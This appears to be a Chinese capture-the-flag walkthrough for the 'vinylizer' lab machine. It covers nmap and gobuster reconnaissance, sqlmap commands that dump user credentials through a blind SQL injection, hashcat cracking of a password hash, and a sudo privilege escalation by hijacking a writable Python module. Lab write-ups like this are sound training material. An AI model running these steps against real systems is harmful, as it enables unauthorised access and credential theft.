OSCP 靶场
靶场介绍
vinylizer |
easy |
常规信息收集、漏洞挖掘、sql盲注、python库劫持提权 |
信息收集
主机发现
nmap -sn 192.168.31.0/24
端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.31.10
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-08 03:43 EST
Nmap scan report for 192.168.31.10
Host is up (0.00062s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f8:e3:79:35:12:8b:e7:41:d4:27:9d:97:a5:14:b6:16 (ECDSA)
|_ 256 e3:8b:15:12:6b:ff:97:57:82:e5:20:58:2d:cb:55:33 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Vinyl Records Marketplace
|_http-server-header: Apache/2.4.52 (Ubuntu)
MAC Address: 08:00:27:6D:EC:17 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.62 ms 192.168.31.10
目录扫描
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.31.10 -x php,html,txt -e
漏洞挖掘
经测试发现登录处存在sql盲注
dump 账号密码
sqlmap -r 1.txt -p username -D vinyl_marketplace --tables
sqlmap -r 1.txt -p username -D vinyl_marketplace -T users --columns
sqlmap -r 1.txt -p username -D vinyl_marketplace -T users -C username,password --dump
hashcat -a 0 -m 0 "9432522ed1a8fca612b11c3980a031f6" /usr/share/wordlists/rockyou.txt
权限获取
通过爆破hash 得到ssh账号密码,成功获取系统权限
权限提升
使用sudo -l 发现vinylizer.py 脚本具有sudo权限
查看脚本可以看到里面调用了random 模块,结合linpeas.sh 脚本发现random 具有写的权限。那么我们可以尝试python库劫持进行提权。
使用linpeas.sh 脚本扫描到可写文件。我们也可以使用如下命令:
find / -type f -writable 2>/dev/null
可以看到权限和属性
接下来我们添加如下代码,进行python 库劫持
sudo /usr/bin/python3 /opt/vinylizer.py
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】vinylizer
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论